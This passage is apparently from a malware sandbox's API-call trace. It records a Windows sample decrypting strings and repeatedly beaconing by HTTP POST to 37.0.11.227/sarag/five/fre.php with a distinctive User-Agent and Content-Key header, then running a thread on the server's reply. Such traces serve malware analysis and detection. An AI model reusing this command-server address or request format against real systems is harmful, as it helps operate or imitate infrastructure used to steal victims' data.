pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0326.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.419] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0326.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.420] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0326.420] GetProcessHeap () returned 0x690000 [0326.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0326.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.421] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0326.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.422] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0326.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.423] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0326.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.424] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0326.424] GetProcessHeap () returned 0x690000 [0326.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0326.424] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0326.425] GetProcessHeap () returned 0x690000 [0326.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0326.425] GetProcessHeap () returned 0x690000 [0326.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.426] GetProcessHeap () returned 0x690000 [0326.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0326.426] GetProcessHeap () returned 0x690000 [0326.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0326.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.427] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0326.449] GetProcessHeap () returned 0x690000 [0326.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0326.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.450] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0326.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.451] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.452] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.452] GetProcessHeap () returned 0x690000 [0326.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0326.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.454] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0326.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.455] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0326.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.457] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0326.457] GetProcessHeap () returned 0x690000 [0326.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0326.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.495] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0326.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.496] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0326.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.497] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0326.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.499] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0326.499] GetProcessHeap () returned 0x690000 [0326.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0326.499] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0326.499] GetProcessHeap () returned 0x690000 [0326.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0326.499] socket (af=2, type=1, protocol=6) returned 0xb58 [0326.500] connect (s=0xb58, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0326.521] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0326.521] GetProcessHeap () returned 0x690000 [0326.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0326.521] GetProcessHeap () returned 0x690000 [0326.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0326.522] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.523] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0326.523] GetProcessHeap () returned 0x690000 [0326.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0326.523] GetProcessHeap () returned 0x690000 [0326.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.524] GetProcessHeap () returned 0x690000 [0326.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0326.524] GetProcessHeap () returned 0x690000 [0326.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0326.524] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.525] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0326.525] GetProcessHeap () returned 0x690000 [0326.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0326.525] GetProcessHeap () returned 0x690000 [0326.526] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.526] send (s=0xb58, buf=0x6ad508*, len=242, flags=0) returned 242 [0326.526] send (s=0xb58, buf=0x6aba40*, len=159, flags=0) returned 159 [0326.527] GetProcessHeap () returned 0x690000 [0326.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0326.527] recv (in: s=0xb58, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0326.612] GetProcessHeap () returned 0x690000 [0326.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0326.613] GetProcessHeap () returned 0x690000 [0326.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0326.613] GetProcessHeap () returned 0x690000 [0326.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0326.613] GetProcessHeap () returned 0x690000 [0326.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0326.614] closesocket (s=0xb58) returned 0 [0326.616] GetProcessHeap () returned 0x690000 [0326.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0326.616] GetProcessHeap () returned 0x690000 [0326.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.616] GetProcessHeap () returned 0x690000 [0326.617] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0326.617] GetProcessHeap () returned 0x690000 [0326.617] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0326.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18a4) returned 0xb58 [0326.620] Sleep (dwMilliseconds=0xea60) [0326.621] GetProcessHeap () returned 0x690000 [0326.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0326.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.622] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.632] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0326.637] GetProcessHeap () returned 0x690000 [0326.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0326.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.638] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0326.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.639] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.640] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.640] GetProcessHeap () returned 0x690000 [0326.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0326.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.644] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0326.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.645] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0326.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.648] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0326.648] GetProcessHeap () returned 0x690000 [0326.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0326.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.649] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0326.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.650] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0326.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.651] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0326.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.652] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0326.652] GetProcessHeap () returned 0x690000 [0326.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0326.652] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0326.652] GetProcessHeap () returned 0x690000 [0326.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0326.653] GetProcessHeap () returned 0x690000 [0326.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.653] GetProcessHeap () returned 0x690000 [0326.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0326.653] GetProcessHeap () returned 0x690000 [0326.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0326.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.661] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0326.666] GetProcessHeap () returned 0x690000 [0326.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0326.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.669] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0326.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.670] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.671] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.671] GetProcessHeap () returned 0x690000 [0326.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0326.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.673] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0326.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.674] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0326.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.676] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0326.676] GetProcessHeap () returned 0x690000 [0326.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0326.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.677] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0326.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.678] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0326.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.679] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0326.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.681] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0326.681] GetProcessHeap () returned 0x690000 [0326.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0326.681] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0326.681] GetProcessHeap () returned 0x690000 [0326.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0326.681] socket (af=2, type=1, protocol=6) returned 0xb5c [0326.681] connect (s=0xb5c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0326.706] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0326.706] GetProcessHeap () returned 0x690000 [0326.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0326.706] GetProcessHeap () returned 0x690000 [0326.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0326.707] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.708] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0326.708] GetProcessHeap () returned 0x690000 [0326.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0326.708] GetProcessHeap () returned 0x690000 [0326.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.709] GetProcessHeap () returned 0x690000 [0326.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0326.709] GetProcessHeap () returned 0x690000 [0326.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0326.710] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0326.714] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0326.714] GetProcessHeap () returned 0x690000 [0326.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0326.714] GetProcessHeap () returned 0x690000 [0326.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0326.716] send (s=0xb5c, buf=0x6ad508*, len=242, flags=0) returned 242 [0326.717] send (s=0xb5c, buf=0x6aba40*, len=159, flags=0) returned 159 [0326.717] GetProcessHeap () returned 0x690000 [0326.717] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0326.717] recv (in: s=0xb5c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0326.792] GetProcessHeap () returned 0x690000 [0326.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0326.793] GetProcessHeap () returned 0x690000 [0326.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0326.794] GetProcessHeap () returned 0x690000 [0326.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0326.794] GetProcessHeap () returned 0x690000 [0326.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0326.794] closesocket (s=0xb5c) returned 0 [0326.795] GetProcessHeap () returned 0x690000 [0326.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0326.795] GetProcessHeap () returned 0x690000 [0326.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0326.795] GetProcessHeap () returned 0x690000 [0326.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0326.796] GetProcessHeap () returned 0x690000 [0326.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0326.797] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18a8) returned 0xb5c [0326.798] Sleep (dwMilliseconds=0xea60) [0326.802] GetProcessHeap () returned 0x690000 [0326.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0326.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.803] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0326.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.810] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0326.817] GetProcessHeap () returned 0x690000 [0326.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0326.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.818] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0326.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.820] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0326.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.821] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0326.821] GetProcessHeap () returned 0x690000 [0326.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0326.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.825] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0326.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.826] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0326.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0326.827] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0326.827] GetProcessHeap () returned 0x690000 [0326.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0326.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.828] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0326.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.835] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0326.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0326.836] StrStrA 